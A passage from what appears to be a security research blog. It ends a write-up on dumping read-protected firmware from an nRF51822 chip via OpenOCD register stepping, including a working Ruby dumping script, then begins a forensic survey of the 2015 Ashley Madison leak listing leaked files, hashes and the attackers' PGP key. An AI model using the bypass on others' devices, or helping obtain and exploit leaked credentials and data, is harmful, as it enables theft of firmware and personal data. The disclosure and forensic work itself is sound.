(4) r4 (/32): 0x00000000
(5) r5 (/32): 0x00000000
(6) r6 (/32): 0x00000000
(7) r7 (/32): 0x00000000
(8) r8 (/32): 0x00000000
(9) r9 (/32): 0x00000000
(10) r10 (/32): 0x00000000
(11) r11 (/32): 0x00000000
(12) r12 (/32): 0x00000000
(13) sp (/32): 0x00000000
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114D0
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000000
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

OK, this time r3 was set to 0x20001BD0. Is that the value at address zero? Let’s see what happens when we run the second instruction with the registers set to 4:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
> reg r0 0x00000004
r0 (/32): 0x00000004
> reg r1 0x00000004
r1 (/32): 0x00000004
> reg r2 0x00000004
r2 (/32): 0x00000004
> reg r3 0x00000004
r3 (/32): 0x00000004
> reg r4 0x00000004
r4 (/32): 0x00000004
> reg r5 0x00000004
r5 (/32): 0x00000004
> reg r6 0x00000004
r6 (/32): 0x00000004
> reg r7 0x00000004
r7 (/32): 0x00000004
> reg r8 0x00000004
r8 (/32): 0x00000004
> reg r9 0x00000004
r9 (/32): 0x00000004
> reg r10 0x00000004
r10 (/32): 0x00000004
> reg r11 0x00000004
r11 (/32): 0x00000004
> reg r12 0x00000004
r12 (/32): 0x00000004
> reg sp 0x00000004
sp (/32): 0x00000004
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114d0 msp: 0x00000004
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000004
(1) r1 (/32): 0x00000004
(2) r2 (/32): 0x00000004
(3) r3 (/32): 0x000114CD
(4) r4 (/32): 0x00000004
(5) r5 (/32): 0x00000004
(6) r6 (/32): 0x00000004
(7) r7 (/32): 0x00000004
(8) r8 (/32): 0x00000004
(9) r9 (/32): 0x00000004
(10) r10 (/32): 0x00000004
(11) r11 (/32): 0x00000004
(12) r12 (/32): 0x00000004
(13) sp (/32): 0x00000004
(14) lr (/32): 0xFFFFFFFF
(15) pc (/32): 0x000114D0
(16) xPSR (/32): 0xC1000000
(17) msp (/32): 0x00000004
(18) psp (/32): 0xFFFFFFFC
(19) primask (/1): 0x00
(20) basepri (/8): 0x00
(21) faultmask (/1): 0x00
(22) control (/2): 0x00
===== Cortex-M DWT registers
(23) dwt_ctrl (/32)
(24) dwt_cyccnt (/32)
(25) dwt_0_comp (/32)
(26) dwt_0_mask (/4)
(27) dwt_0_function (/32)
(28) dwt_1_comp (/32)
(29) dwt_1_mask (/4)
(30) dwt_1_function (/32)

This time, r3 got 0x00014CD. This value actually strongly implies we’re reading memory. Why? The value is actually the reset vector. According to the Cortex-M0 documentation, the reset vector is at address 4, and when we reset the chip, the PC is set to 0x000114CC (the least significant bit is set in the reset vector, changing C to D, because the Cortex-M0 operates in Thumb mode).

Let’s try reading the two instructions we just were testing:

reset halt
target state: halted
target halted due to debug-request, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114cc msp: 0x20001bd0
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114ce msp: 0x20001bd0
> reg r0 0x000114cc
r0 (/32): 0x000114CC
> reg r1 0x000114cc
r1 (/32): 0x000114CC
> reg r2 0x000114cc
r2 (/32): 0x000114CC
> reg r3 0x000114cc
r3 (/32): 0x000114CC
> reg r4 0x000114cc
r4 (/32): 0x000114CC
> reg r5 0x000114cc
r5 (/32): 0x000114CC
> reg r6 0x000114cc
r6 (/32): 0x000114CC
> reg r7 0x000114cc
r7 (/32): 0x000114CC
> reg r8 0x000114cc
r8 (/32): 0x000114CC
> reg r9 0x000114cc
r9 (/32): 0x000114CC
> reg r10 0x000114cc
r10 (/32): 0x000114CC
> reg r11 0x000114cc
r11 (/32): 0x000114CC
> reg r12 0x000114cc
r12 (/32): 0x000114CC
> reg sp 0x000114cc
sp (/32): 0x000114CC
> step
target state: halted
target halted due to single-step, current mode: Thread
xPSR: 0xc1000000 pc: 0x000114d0 msp: 0x000114cc
> reg r3
r3 (/32): 0x681B4B13

The r3 register has the value 0x681B4B13. That disassembles to two load instructions, the first relative to the pc, the second relative to r3:

$ printf "x13x4bx1bx68" > /tmp/armcode

$ arm-none-eabi-objdump -D --target binary -Mforce-thumb -marm /tmp/armcode




/tmp/armcode:     file format binary

Disassembly of section .data:

00000000 <.data>:
   0:   4b13            ldr     r3, [pc, #76]   ; (0x50)
   2:   681b            ldr     r3, [r3, #0]

In case you don’t read Thumb assembly, that second instruction is a load register instruction (ldr); it’s taking an address from the r3 register, adding an offset of zero, and loading the value from that address into the r3 register.

We’ve found a load instruction that lets us read memory from an arbitrary address. Again, this is useful because only code in the protected memory can read the protected memory. The trick is that being able to read and write CPU registers using OpenOCD lets us execute those instructions however we want. If we hadn’t been lucky enough to find the load word instruction so close to the reset vector, we could have reset the processor and written a value to the pc register (jumping to an arbitrary address) to try more instructions. Since we were lucky though, we can just step through the first instruction.

Dumping the Firmware

Now that we’ve found a load instruction that we can execute to read from arbitrary addresses, our firmware dumping process is as follows:

  1. Reset the CPU
  2. Single step (we don’t care about the first instruction)
  3. Put the address we want to read from into r3
  4. Single step (this loads from the address in r3 to r3)
  5. Read the value from r3

Here’s a ruby script to automate the process:

#!/usr/bin/env ruby

require 'net/telnet'

debug = Net::Telnet::new("Host" => "localhost", 
                         "Port" => 4444)

dumpfile = File.open("dump.bin", "w")

((0x00000000/4)...(0x00040000)/4).each do |i|
  address = i * 4
  debug.cmd("reset halt")
  debug.cmd("step")
  debug.cmd("reg r3 0x#{address.to_s 16}")
  debug.cmd("step")
  response = debug.cmd("reg r3")
  value = response.match(/: 0x([0-9a-fA-F]{8})/)[1].to_i 16
  dumpfile.write([value].pack("V"))
  puts "0x%08x:  0x%08x" % [address, value]
end

dumpfile.close
debug.close

The ruby script connects to the OpenOCD user interface, which is available via a telnet connection on localhost. It then loops through addresses that are multiples of four, using the load instruction we found to read data from those addresses.

Vendor Response

IncludeSec contacted NordicSemi via their customer support channel where they received a copy of this blog post. From NordicSemi customer support: We take this into consideration together with other factors, and the discussions around this must be kept internal.”
We additionally reached out to the only engineer who had security in his title and he didn’t really want a follow-up Q&A call or further info and redirected us to only talk to customer support. So that’s about all we can do for coordinated disclosure on our side.

Conclusion

Once we have a copy of the firmware image, we can do whatever disassembly or reverse engineering we want with it. We can also now disable the chip’s PALL protection in order to more easily debug the code. To disable PALL, you need to erase the chip, but that’s not a problem since we can immediately re-flash the chip using the dumped firmware. Once that the chip has been erased and re-programmed to disable the protection we can freely use the debugger to: read and write RAM, set breakpoints, and so on. We can even attach GDB to OpenOCD, and debug the firmware that way.

The technique described here won’t work on all microcontrollers or SoCs; it only applies to situations where you have access to a debugging interface that can read and write CPU registers but not protected memory. Despite the limitation though, the technique can be used to dump firmware from nRF51822 chips and possibly others that use similar protections. We feel this is a vulnerability in the design of the nRF51822 code protection.

Are you using other cool techniques to dump firmware? Do you know of any other microcontrollers or SoCs that might be vulnerable to this type of code protection bypass? Let us know in the comments.

The post Firmware dumping technique for an ARM Cortex-M0 SoC appeared first on Include Security Research Blog.

A light-weight forensic analysis of the AshleyMadison Hack

19 August 2015 at 14:13

———–[Intro]

So Ashley Madison(AM) got hacked, it was first announced about a month ago and the attackers claimed they’d drop the full monty of user data if the AM website did not cease operations. The AM parent company Avid Life Media(ALM) did not cease business operations for the site and true to their word it seems the attackers have leaked everything they promised on August 18th 2015 including:

  • full database dumps of user data
  • emails
  • internal ALM documents
  • as well as a limited number of user passwords

Back in college I used to do forensics contests for the “Honey Net Project” and thought this might be a fun nostalgic trip to try and recreate my pseudo-forensics investigation style on the data within the AM leak.

Disclaimer: I will not be releasing any personal or confidential information
within this blog post that may be found in the AM leak. The purpose of
this blog post is to provide an honest holistic forensic analysis and minimal
statistical analysis of the data found within the leak. Consider this a
journalistic exploration more than anything.

Also note, that the credit card files were deleted and not reviewed as part of this write-up

———–[Grabbing the Leak]

First we go find where on the big bad dark web the release site is located. Thankfully knowing a shady guy named Boris pays off for me, and we find a torrent file for the release of the August 18th Ashley Madison user data dump. The torrent file we found has the following SHA1 hash.
e01614221256a6fec095387cddc559bffa832a19  impact-team-ashley-release.torrent

After extracting all the files we have the following sizes and
file hashes for evidence audit purposes:

$  du -sh *
4.0K    74ABAA38.txt
9.5G    am_am.dump
2.6G    am_am.dump.gz
4.0K    am_am.dump.gz.asc
13G     aminno_member.dump
3.1G    aminno_member.dump.gz
4.0K    aminno_member.dump.gz.asc
1.7G    aminno_member_email.dump
439M    aminno_member_email.dump.gz
4.0K    aminno_member_email.dump.gz.asc
111M    ashleymadisondump/
37M     ashleymadisondump.7z
4.0K    ashleymadisondump.7z.asc
278M    CreditCardTransactions.7z
4.0K    CreditCardTransactions.7z.asc
2.3G    member_details.dump
704M    member_details.dump.gz
4.0K    member_details.dump.gz.asc
4.2G    member_login.dump
2.7G    member_login.dump.gz
4.0K    member_login.dump.gz.asc
4.0K    README
4.0K    README.asc

$ sha1sum *
a884c4fcd61e23aecb80e1572254933dc85e2b4a  74ABAA38.txt
e4ff3785dbd699910a512612d6e065b15b75e012  am_am.dump
e0020186232dad71fcf92c17d0f11f6354b4634b  am_am.dump.gz
b7363cca17b05a2a6e9d8eb60de18bc98834b14e  am_am.dump.gz.asc
d412c3ed613fbeeeee0ab021b5e0dd6be1a79968  aminno_member.dump
bc60db3a78c6b82a5045b797e6cd428f367a18eb  aminno_member.dump.gz
8a1c328142f939b7f91042419c65462ea9b2867c  aminno_member.dump.gz.asc
2dcb0a5c2a96e4f3fff5a0a3abae19012d725a7e  aminno_member_email.dump
ab5523be210084c08469d5fa8f9519bc3e337391  aminno_member_email.dump.gz
f6144f1343de8cc51dbf20921e2084f50c3b9c86  aminno_member_email.dump.gz.asc
sha1sum: ashleymadisondump: Is a directory
26786cb1595211ad3be3952aa9d98fbe4c5125f9  ashleymadisondump.7z
eb2b6f9b791bd097ea5a3dca3414a3b323b8ad37  ashleymadisondump.7z.asc
0ad9c78b9b76edb84fe4f7b37963b1d956481068  CreditCardTransactions.7z
cb87d9fb55037e0b1bccfe50c2b74cf2bb95cd6c  CreditCardTransactions.7z.asc
11e646d9ff5d40cc8e770a052b36adb18b30fd52  member_details.dump
b4849cec980fe2d0784f8d4409fa64b91abd70ef  member_details.dump.gz
3660f82f322c9c9e76927284e6843cbfd8ab8b4f  member_details.dump.gz.asc
436d81a555e5e028b83dcf663a037830a7007811  member_login.dump
89fbc9c44837ba3874e33ccdcf3d6976f90b5618  member_login.dump.gz
e24004601486afe7e19763183934954b1fc469ef  member_login.dump.gz.asc
4d80d9b671d95699edc864ffeb1b50230e1ec7b0  README
a9793d2b405f31cc5f32562608423fffadc62e7a  README.asc

———–[Attacker Identity & Attribution]

The attackers make it clear they have no desire to bridge their dark web identities with their real-life identities and have taken many measures to ensure this does not occur.

The torrent file and messaging were released via the anonymous Tor network through an Onion web server which serves only HTML/TXT content. If the attacker took proper OPSEC precautions while setting up the server, law enforcement and AM may never find them. That being said hackers have been known to get sloppy and slip up their OPSEC. The two most famous cases of this were when Sabu of Anonymous and separately the Dread Pirate Roberts of SilkRoad; were both caught even though they primarily used Tor for their internet activities.

Within the dump we see that the files are signed with PGP. Signing a file in this manner is a way of saying “I did this” even though we don’t know the real-life identity of the person/group claiming to do this is (there is a bunch of crypto and math that makes this possible.) As a result we can be more confident that if there are files which are signed by this PGP key, then it was released by the same person/group.

In my opinion, this is done for two reasons. First the leaker wants to claim responsibility in an identity attributable manner, but not reveal their real-life identity. Secondly, the leaker wishes to dispel statements regarding “false leaks” made by the Ashley Madison team. The AM executive and PR teams have been in crises communications mode explaining that there have been many fake leaks.

The “Impact Team” is using the following public PGP key to sign their releases.

$ cat ./74ABAA38.txt

-----BEGIN PGP PUBLIC KEY BLOCK-----

Version: GnuPG v1.4.12 (GNU/Linux)




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
uZnr
=v0qe
-----END PGP PUBLIC KEY BLOCK-----

The key has the following Meta-data below.

Old: Public Key Packet(tag 6)(525 bytes)
        Ver 4 - new
        Public key creation time - Mon Jul 27 22:15:10 EDT 2015
        Pub alg - RSA Encrypt or Sign(pub 1)
        RSA n(4096 bits) - ...
        RSA e(17 bits) - ...
Old: User ID Packet(tag 13)(36 bytes)
        User ID - Impact Team <[email protected]>
Old: Signature Packet(tag 2)(568 bytes)
        Ver 4 - new
        Sig type - Positive certification of a User ID and Public Key packet(0x13).
        Pub alg - RSA Encrypt or Sign(pub 1)
        Hash alg - SHA1(hash 2)
        Hashed Sub: signature creation time(sub 2)(4 bytes)
                Time - Mon Jul 27 22:15:10 EDT 2015
        Hashed Sub: key flags(sub 27)(1 bytes)
                Flag - This key may be used to certify other keys
                Flag - This key may be used to sign data
        Hashed Sub: preferred symmetric algorithms(sub 11)(5 bytes)
                Sym alg - AES with 256-bit key(sym 9)
                Sym alg - AES with 192-bit key(sym 8)
                Sym alg - AES with 128-bit key(sym 7)
                Sym alg - CAST5(sym 3)
                Sym alg - Triple-DES(sym 2)
        Hashed Sub: preferred hash algorithms(sub 21)(5 bytes)
                Hash alg - SHA256(hash 8)
                Hash alg - SHA1(hash 2)
                Hash alg - SHA384(hash 9)
                Hash alg - SHA512(hash 10)
                Hash alg - SHA224(hash 11)
        Hashed Sub: preferred compression algorithms(sub 22)(3 bytes)
                Comp alg - ZLIB <RFC1950>(comp 2)
                Comp alg - BZip2(comp 3)
                Comp alg - ZIP <RFC1951>(comp 1)
        Hashed Sub: features(sub 30)(1 bytes)
                Flag - Modification detection (packets 18 and 19)
        Hashed Sub: key server preferences(sub 23)(1 bytes)
                Flag - No-modify
        Sub: issuer key ID(sub 16)(8 bytes)
                Key ID - 0x24373CD574ABAA38
        Hash left 2 bytes - e3 95
        RSA m^d mod n(4096 bits) - ...
                -> PKCS-1
Old: Public Subkey Packet(tag 14)(525 bytes)
        Ver 4 - new
        Public key creation time - Mon Jul 27 22:15:10 EDT 2015
        Pub alg - RSA Encrypt or Sign(pub 1)
        RSA n(4096 bits) - ...
        RSA e(17 bits) - ...
Old: Signature Packet(tag 2)(543 bytes)
        Ver 4 - new
        Sig type - Subkey Binding Signature(0x18).
        Pub alg - RSA Encrypt or Sign(pub 1)
        Hash alg - SHA1(hash 2)
        Hashed Sub: signature creation time(sub 2)(4 bytes)
                Time - Mon Jul 27 22:15:10 EDT 2015
        Hashed Sub: key flags(sub 27)(1 bytes)
                Flag - This key may be used to encrypt communications
                Flag - This key may be used to encrypt storage
        Sub: issuer key ID(sub 16)(8 bytes)
                Key ID - 0x24373CD574ABAA38
        Hash left 2 bytes - 0b 61
        RSA m^d mod n(4095 bits) - ...
                -> PKCS-1

We can verify the released files are attributable to the PGP public key
in question using the following commands:

$ gpg --import ./74ABAA38.txt
$ gpg --verify ./member_details.dump.gz.asc ./member_details.dump.gz
gpg: Signature made Sat 15 Aug 2015 11:23:32 AM EDT using RSA key ID 74ABAA38
gpg: Good signature from "Impact Team <[email protected]>"
gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: 6E50 3F39 BA6A EAAD D81D  ECFF 2437 3CD5 74AB AA38

This also tells us at what date the dump was signed and packaged.

———–[Catching the attackers]

The PGP key’s meta-data shows a user ID for the mailtor dark web email service. The last known location of which was:
http://mailtoralnhyol5v.onion

Don’t bother emailing the email address found in the PGP key as it does not have a valid MX record. The fact that this exists at all seems to be one of those interesting artifact of what happens when Internet tools like GPG get used on the dark web.

If the AM attackers were to be caught; here (in no particular order) are the most likely ways this would happen:

  • The person(s) responsible tells somebody. Nobody keeps something like this a secret, if the attackers tell anybody, they’re likely going to get caught.
  • If the attackers review email from a web browser, they might get revealed via federal law enforcement or private investigation/IR teams hired by AM. The FBI is known to have these capabilities.
  • If the attackers slip up with their diligence in messaging only via TXT and HTML on the web server. Meta-data sinks ships kids — don’t forget.
  • If the attackers slip up with their diligence on configuring their server. One bad config of a web server leaks an internal IP, or worse!
  • The attackers slipped up during their persistent attack against AM and investigators hired by AM find evidence leading back to the attackers.
  • The attackers have not masked their writing or image creation style and leave some semantic finger print from which they can be profiled.

If none of those  things happen, I don’t think these attackers will ever be caught. The cyber-crime fighters have a daunting task in front of them, I’ve helped out a couple FBI and NYPD cyber-crime fighters and I do not envy the difficult and frustrating job they have — good luck to them! Today we’re living in the Wild West days of the Internet.

———–[Leaked file extraction and evidence gathering]

Now to document the information seen within this data leak we proceed with a couple of commands to gather the file size and we’ll also check the file hashes to ensure the uniqueness of the files. Finally we review the meta-data of some of the compressed files. The meta-data shows the time-stamp embedded into the various compressed files. Although meta-data can easily be faked, it is usually not.

Next we’ll extract these files and examine their file size to take a closer look.

$ 7z e ashleymadisondump.7z

We find within the extracted 7zip file another 7zip file
“swappernet_User_Table.7z” was found and also extracted.

We now have the following files sizes and SHA1 hashes for evidence
integrity & auditing purposes:

$ du -sh ashleymadisondump/*
68K     20131002-domain-list.xlsx
52K     ALMCLUSTER (production domain) computers.txt
120K    ALMCLUSTER (production domain) hashdump.txt
68K     ALM - Corporate Chart.pptx
256K    ALM Floor Plan - ports and names.pdf
8.0M    ALM - January 2015 - Company Overview.pptx
1.8M    ALM Labs Inc. Articles of Incorporation.pdf
708K    announcement.png
8.0K    Areas of concern - customer data.docx
8.0K    ARPU and ARPPU.docx
940K    Ashley Madison Technology Stack v5(1).docx
16K     Avid Life Media - Major Shareholders.xlsx
36K     AVIDLIFEMEDIA (primary corporate domain) computers.txt
332K    AVIDLIFEMEDIA (primary corporate domain) user information and hashes.txt
1.7M    Avid Org Chart 2015 - May 14.pdf
24K     Banks.xlsx
6.1M    Copies of Option Agreements.pdf
8.0K    Credit useage.docx
16K     CSF Questionnaire (Responses).xlsx
132K    Noel's loan agreement.pdf
8.0K    Number of traveling man purchases.docx
1.5M    oneperday_am_am_member.txt
940K    oneperday_aminno_member.txt
672K    oneperday.txt
44K     paypal accounts.xlsx
372K    [email protected]_20101103_133855.pdf
16K     q2 2013 summary compensation detail_managerinput_trevor-s team.xlsx
8.0K    README.txt
8.0K    Rebill Success Rate Queries.docx
8.0K    Rev by traffic source rebill broken out.docx
8.0K    Rev from organic search traffic.docx
4.0K    Sales Queries
59M     swappernet_QA_User_Table.txt  #this was extracted from swappernet_User_Table.7z in the same dir
17M     swappernet_User_Table.7z
$ sha1sum ashleymadisondump/*
f0af9ea887a41eb89132364af1e150a8ef24266f  20131002-domain-list.xlsx
30401facc68dab87c98f7b02bf0a986a3c3615f0  ALMCLUSTER (production domain) computers.txt
c36c861fd1dc9cf85a75295e9e7bcf6cf04c7d2c  ALMCLUSTER (production domain) hashdump.txt
6be635627aa38462ebcba9266bed5b492a062589  ALM - Corporate Chart.pptx
4dec7623100f59395b68fd13d3dcbbff45bef9c9  ALM Floor Plan - ports and names.pdf
601e0b462e1f43835beb66743477fe94bbda5293  ALM - January 2015 - Company Overview.pptx
d17cb15a5e3af15bc600421b10152b2ea1b9c097  ALM Labs Inc. Articles of Incorporation.pdf
1679eca2bc172cba0b5ca8d14f82f9ced77f10df  announcement.png
6a618e7fc62718b505afe86fbf76e2360ade199d  Areas of concern - customer data.docx
91f65350d0249211234a52b260ca2702dd2eaa26  ARPU and ARPPU.docx
50acee0c8bb27086f12963e884336c2bf9116d8a  Ashley Madison Technology Stack v5(1).docx
71e579b04bbba4f7291352c4c29a325d86adcbd2  Avid Life Media - Major Shareholders.xlsx
ef8257d9d63fa12fb7bc681320ea43d2ca563e3b  AVIDLIFEMEDIA (primary corporate domain) computers.txt
ec54caf0dc7c7206a7ad47dad14955d23b09a6c0  AVIDLIFEMEDIA (primary corporate domain) user information and hashes.txt
614e80a1a6b7a0bbffd04f9ec69f4dad54e5559e  Avid Org Chart 2015 - May 14.pdf
c3490d0f6a09bf5f663cf0ab173559e720459649  Banks.xlsx
1538c8f4e537bb1b1c9a83ca11df9136796b72a3  Copies of Option Agreements.pdf
196b1ba40894306f05dcb72babd9409628934260  Credit useage.docx
2c9ba652fb96f6584d104e166274c48aa4ab01a3  CSF Questionnaire (Responses).xlsx
0068bc3ee0dfb796a4609996775ff4609da34acb  Noel's loan agreement.pdf
c3b4d17fc67c84c54d45ff97eabb89aa4402cae8  Number of traveling man purchases.docx
9e6f45352dc54b0e98932e0f2fe767df143c1f6d  oneperday_am_am_member.txt
de457caca9226059da2da7a68caf5ad20c11de2e  oneperday_aminno_member.txt
d596e3ea661cfc43fd1da44f629f54c2f67ac4e9  oneperday.txt
37fdc8400720b0d78c2fe239ae5bf3f91c1790f4  paypal accounts.xlsx
2539bc640ea60960f867b8d46d10c8fef5291db7  [email protected]_20101103_133855.pdf
5bb6176fc415dde851262ee338755290fec0c30c  q2 2013 summary compensation detail_managerinput_trevor-s team.xlsx
5435bfbf180a275ccc0640053d1c9756ad054892  README.txt
872f3498637d88ddc75265dab3c2e9e4ce6fa80a  Rebill Success Rate Queries.docx
d4e80e163aa1810b9ec70daf4c1591f29728bf8e  Rev by traffic source rebill broken out.docx
2b5f5273a48ed76cd44e44860f9546768bda53c8  Rev from organic search traffic.docx
sha1sum: Sales Queries: Is a directory
0f63704c118e93e2776c1ad0e94fdc558248bf4e  swappernet_QA_User_Table.txt
9d67a712ef6c63ae41cbba4cf005ebbb41d92f33  swappernet_User_Table.7z

———–[Quick summary of each of the leaked files]

The following files are MySQL data dumps of the main AM database:

  • member_details.dump.gz
  • aminno_member.dump.gz
  • member_login.dump.gz
  • aminno_member_email.dump.gz
  • CreditCardTransactions.7z

Also included was another AM database which contains user info (separate from the emails):

  • am_am.dump.gz

In the top level directory you can also find these additional files:

  • 74ABAA38.txt
    Impact Team’s Public PGP key used for signing the releases (The .asc files are the signatures)
  • ashleymadisondump.7z
    This contains various internal and corporate private files.
  • README
    Impact Team’s justification for releasing the user data.
  • Various .asc files such as “member_details.dump.gz.asc”
    These are all PGP signature files to prove that one or more persons who are part of the “Impact Team” attackers released them.

Within the ashleymadisondump.7z we can extract and view the following files:

  • Number of traveling man purchases.docx
    SQL queries to investigate high-travel user’s purchases.
  • q2 2013 summary compensation detail_managerinput_trevor-s team.xlsx
    Per-employee compensation listings.
  • AVIDLIFEMEDIA (primary corporate domain) user information and hashes.txt
  • AVIDLIFEMEDIA (primary corporate domain) computers.txt
    The output of the dnscmd windows command executing on what appears to be a primary domain controller. The timestamp indicates that the command was run on July 1st 2015. There is also “pwdump” style export of 1324 user accounts which appear to be from the ALM domain controller. These passwords will be easy to crack as NTLM hashes aren’t the strongest
  • Noel’s loan agreement.pdf
    A promissory note for the CEO to pay back ~3MM in Canadian monies.
  • Areas of concern – customer data.docx
    Appears to be a risk profile of the major security concerns that ALM has regarding their customer’s data. And yes, a major user data dump is on the list of concerns.
  • Banks.xlsx
    A listing of all ALM associated bank account numbers and the biz which owns them.
  • Rev by traffic source rebill broken out.docx
  • Rebill Success Rate Queries.docx
    Both of these are SQL queries to investigate Rebilling of customers.
  • README.txt
    Impact Team statement regarding their motivations for the attack and leak.
  • Copies of Option Agreements.pdf
    All agreements for what appears all of the company’s outstanding options.
  • paypal accounts.xlsx
    Various user/passes for ALM paypal accounts (16 in total)
  • swappernet_QA_User_Table.txt
  • swappernet_User_Table.7z
    This file is a database export into CSV format. I appears to be from a QA server
  • ALMCLUSTER (production domain) computers.txt
    The output of the dnscmd windows command executing on what appears to be a production domain controller. The timestamp indicates that the command was run on July 1st 2015.
  • ALMCLUSTER (production domain) hashdump.txt
